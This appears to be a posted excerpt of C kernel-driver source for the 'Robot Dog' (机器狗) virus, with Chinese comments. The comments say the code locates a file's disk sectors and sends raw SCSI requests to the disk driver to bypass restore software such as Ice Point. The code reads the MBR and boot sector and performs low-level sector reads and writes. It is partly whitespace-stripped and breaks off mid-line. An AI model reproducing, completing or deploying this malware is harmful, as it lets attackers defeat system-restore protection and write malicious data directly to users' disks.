机器狗病毒源码1C语言
//备注:
获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
//编译时注意:
FileSystemControl的数据结构需要自己添加。
#include
#include
#defineFSCTL_GET_RETRIEVAL_POINTERS0x90073
#definePARTITION_TYPE_NTFS0x07
#definePARTITION_TYPE_FAT320x0B
#definePARTITION_TYPE_FAT32_LBA0x0C
externPOBJECT_TYPE*IoDriverObjectType;
LARGE_INTEGERrealdiskpos;
ULONGsectorspercluster;
typedefstructRETRIEVAL_POINTERS_BUFFER{
ULONGExtentCount;
LARGE_INTEGERStartingVcn;
struct{
LARGE_INTEGERNextVcn;
LARGE_INTEGERLcn;
}Extents[1];
}RETRIEVAL_POINTERS_BUFFER,*PRETRIEVAL_POINTERS_BUFFER;
typedefstruct{LARGE_INTEGERStartingVcn;
}STARTING_VCN_INPUT_BUFFER,*PSTARTING_VCN_INPUT_BUFFER;
typedefstruct_SENSE_DATA{
unsignedcharValid;
unsignedcharSegmentNumber;
unsignedcharFileMark;
unsignedcharInformation[4];
unsignedcharAdditionalSenseLength;
unsignedcharCommandSpecificInformation[4];
unsignedcharAdditionalSenseCode;
unsignedcharAdditionalSenseCodeQualifier;
unsignedcharFieldReplaceableUnitCode;
unsignedcharSenseKeySpecific[3];
}SENSE_DATA,*PSENSE_DATA;
#pragmapack
(1)
typedefstruct_PARTITION_ENTRY
{
UCHARactive;
UCHARStartHead;
UCHARStartSector;
UCHARStartCylinder;
UCHARPartitionType;
UCHAREndHead;
UCHAREndSector;
UCHAREndCylinder;
ULONGStartLBA;
ULONGTotalSector;
}PARTITION_ENTRY,*PPARTITION_ENTRY;
typedefstruct_MBR_SECTOR
{
UCHARBootCode[446];
PARTITION_ENTRYPartition[4];
USHORTSignature;
}MBR_SECTOR,*PMBR_SECTOR;
typedefstruct_BBR_SECTOR
{
USHORTJmpCode;
UCHARNopCode;
UCHAROEMName[8];
USHORTBytesPerSector;
UCHARSectorsPerCluster;
USHORTReservedSectors;
UCHARNumberOfFATs;
USHORTRootEntries;
USHORTNumberOfSectors16;
UCHARMediaDescriptor;
USHORTSectorsPerFAT16;
USHORTSectorsPerTrack;
USHORTHeadsPerCylinder;
ULONGHiddenSectors;
ULONGNumberOfSectors32;
ULONGSectorsPerFAT32;
}BBR_SECTOR,*PBBR_SECTOR;
#pragmapack()
typedefstruct_SYSTEM_MODULE_INFORMATION{
ULONGReserved[2];
PVOIDBase;
ULONGSize;
ULONGFlags;
USHORTIndex;
USHORTUnknown;
USHORTLoadCount;
USHORTModuleNameOffset;
CHARImageName[255];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
INPUNICODE_STRINGObjectName,
INULONGAttributes,
INPACCESS_STATEAccessStateOPTIONAL,
INACCESS_MASKDesiredAccessOPTIONAL,
INPOBJECT_TYPEObjectType,
INKPROCESSOR_MODEAccessMode,
INOUTPVOIDParseContextOPTIONAL,
OUTPVOID*Object);
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
INULONGSystemInformationClass,
INOUTPVOIDSystemInformation,
INULONGSystemInformationLength,
OUTPULONGReturnLength);
NTSTATUS
IrpCompletionRoutine(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(!
Context)
{
mdl=Irp->MdlAddress;
if(mdl){
DbgPrint("readsize:
%d..",Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
NTSTATUSIrpCompletionRoutine_0(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(!
Context)
{
mdl=Irp->MdlAddress;
if(mdl)
{
DbgPrint("readsize:
%d..",Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
}
KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
ULONGGetModuleBase(char*name){
ULONGn,i;
PSYSTEM_MODULE_INFORMATIONmodule;
PVOIDpbuftmp;
charmodulename[255];
ZwQuerySystemInformation(11,&n,0,&n);
pbuftmp=ExAllocatePool(NonPagedPool,n);
ZwQuerySystemInformation(11,pbuftmp,n,NULL);
module=(PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp+1);
n=*((PULONG)pbuftmp);
for(i=0;i { strcpy(modulename,module.ImageName+module.ModuleNameOffset); if(! _strnicmp(modulename,name,strlen(name))){ ExFreePool(pbuftmp); return(ULONG)module.Base; } } ExFreePool(pbuftmp); return0; } NTSTATUSMyIoCallDriver(PDEVICE_OBJECTDeviceObject,PIRPIrp)//自己的IoCallDriver { PIO_STACK_LOCATIONstack; --Irp->CurrentLocation; stack=IoGetNextIrpStackLocation(Irp); Irp->Tail.Overlay.CurrentStackLocation=stack;//移动堆栈 stack->DeviceObject=DeviceObject; return(DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject,Irp); } ULONGAtapiReadWriteDisk(PDEVICE_OBJECTdev_object,ULONGMajorFunction,PVOIDbuffer,ULONGDiskPos,intBlockCount) { NTSTATUSstatus; PSCSI_REQUEST_BLOCKsrb; PSENSE_DATAsense; KEVENTEvent; PIRPirp; PMDLmdl; IO_STATUS_BLOCKisb; PIO_STACK_LOCATIONisl; PVOIDpsense; intcount=8; while (1){ srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK)); if(! srb) break; sense=ExAllocatePool(0,sizeof(SENSE_DATA)); psense=sense; if(! sense) break; memset(srb,0,sizeof(SCSI_REQUEST_BLOCK)); memset(sense,0,sizeof(SENSE_DATA)); srb->Length=sizeof(SCSI_REQUEST_BLOCK);//更多关于srb,请看《SCSI总线和IDE接口: 协议、应用和编程》和《SCSI程序员指南》 srb->Function=0; srb->DataBuffer=buffer; srb->DataTransferLength=BlockCount<<9;//sectorsize*numberofsector srb->QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE; srb->SrbStatus=0; srb->ScsiStatus=0; srb->NextSrb=0; srb->SenseInfoBuffer=sense; srb->SenseInfoBufferLength=sizeof(SENSE_DATA); if(MajorFunction==IRP_MJ_READ) srb->SrbFlags=SRB_FLAGS_DATA_IN; else srb->SrbFlags=SRB_FLAGS_DATA_OUT; if(MajorFunction==IRP_MJ_READ) srb->SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE; srb->SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE; srb->TimeOutValue=(srb->DataTransferLength>>10)+1; srb->QueueSortKey=DiskPos; srb->CdbLength=10; srb->Cdb[0]=2*((UCHAR)MajorFunction+17); srb->Cdb[1]=srb->Cdb[1]&0x1F|0x80; srb->Cdb[2]=(unsignedchar)(DiskPos>>0x18)&0xFF;// srb->Cdb[3]=(unsignedchar)(DiskPos>>0x10)&0xFF;// srb->Cdb[4]=(unsignedchar)(DiskPos>>0x08)&0xFF;// 
srb->Cdb[5]=(UCHAR)DiskPos;//填写sector位置 srb->Cdb[7]=(UCHAR)BlockCount>>0x08; srb->Cdb[8]=(UCHAR)BlockCount; //By: Eros412 KeInitializeEvent(&Event,0,0); irp=IoAllocateIrp(dev_object->StackSize,0); mdl=IoAllocateMdl(buffer,BlockCount<<9,0,0,irp); irp->MdlAddress=mdl; if(! mdl){ ExFreePool(srb); ExFreePool(psense); IoFreeIrp(irp); returnSTATUS_INSUFFICIENT_RESOURCES; } MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ? 0: 1)); srb->OriginalRequest=irp; irp->UserIosb=&isb; irp->UserEvent=&Event; irp->IoStatus.Status=0; irp->IoStatus.Information=0; irp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE; irp->AssociatedIrp.SystemBuffer=0; irp->Cancel=0; irp->RequestorMode=0; irp->CancelRoutine=0; irp->Tail.Overlay.Thread=PsGetCurrentThread(); isl=IoGetNextIrpStackLocation(irp); isl->DeviceObject=dev_object; isl->MajorFunction=IRP_MJ_SCSI; isl->Parameters.Scsi.Srb=srb; isl->CompletionRoutine=IrpCompletionRoutine_0; isl->Context=srb; isl->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR; status=MyIoCallDriver(dev_object,irp); KeWaitForSingleObject(&Event,0,0,0,0); if(srb->SenseInfoBuffer! =psense&&srb->SenseInfoBuffer) ExFreePool(srb->SenseInfoBuffer); ExFreePool(srb); ExFreePool(psense); if(status>=0||! 
count) returnstatus; DbgPrint("SendXXXFailed..%08x\r\n",status); KeStallExecutionProcessor(1u); --count; } returnSTATUS_INSUFFICIENT_RESOURCES; } PDEVICE_OBJECTGetLastDiskDeviceObject(PDRIVER_OBJECTdrv_object)//这个就是DR0 { PDEVICE_OBJECTresult; PDEVICE_OBJECTfinddev; finddev=drv_object->DeviceObject; result=NULL; while(finddev) { if(finddev->DeviceType==FILE_DEVICE_DISK) result=finddev; finddev=finddev->NextDevice; } returnresult; } PDEVICE_OBJECTGetAtaDr0DevObject(){ UNICODE_STRINGdiskstr; PDRIVER_OBJECTdiskdrv; PDEVICE_OBJECTdr0dev; RtlInitUnicodeString(&diskstr,L"\\Driver\\Disk"); if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)<0) returnNULL; dr0dev=GetLastDiskDeviceObject(diskdrv); if(dr0dev) DbgPrint("Eros412said: atadr0devobjis: %08x...",dr0dev); ObfDereferenceObject(diskdrv); returndr0dev; } PDEVICE_OBJECTGetFileObjectDevice(PFILE_OBJECTObject){ PDEVICE_OBJECTresult=NULL; PVPBvpb; vpb=Object->Vpb; result=vpb->DeviceObject; if(! vpb||! result) { if(! Object->DeviceObject->Vpb||! 
Object->DeviceObject->Vpb->DeviceObject) result=Object->DeviceObject; } returnresult; } PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置 { PVOIDbuffer; ULONGtype,startlba; inti; PLARGE_INTEGERresult; PDEVICE_OBJECTdev; PMBR_SECTORmbrsec; PPARTITION_ENTRYpartition0; PBBR_SECTORbootsec; result=ExAllocatePool(0,sizeof(LARGE_INTEGER)); dev=GetAtaDr0DevObject(); if(dev){ buffer=ExAllocatePool(0,512); memset(buffer,0,512); if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>0) DbgPrint("AtapiReadWriteDiskok"); mbrsec=(PMBR_SECTOR)buffer; partition0=&mbrsec->Partition[0]; startlba=partition0[0].StartLBA; type=partition0[0].PartitionType; DbgPrint("dwPartOnePos: 0x%08x..1",startlba); result->QuadPart=startlba; memset(buffer,0,512); if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>0){ bootsec=(PBBR_SECTOR)buffer; DbgPrint("gSectorsPerCluster: %d...",bootsec->SectorsPerCluster); sectorspercluster=bootsec->SectorsPerCluster; } result->QuadPart+=bootsec->ReservedSectors; DbgPrint("dwPartOnePos: %I64x..2\r\n",result->QuadPart); if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA) result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFA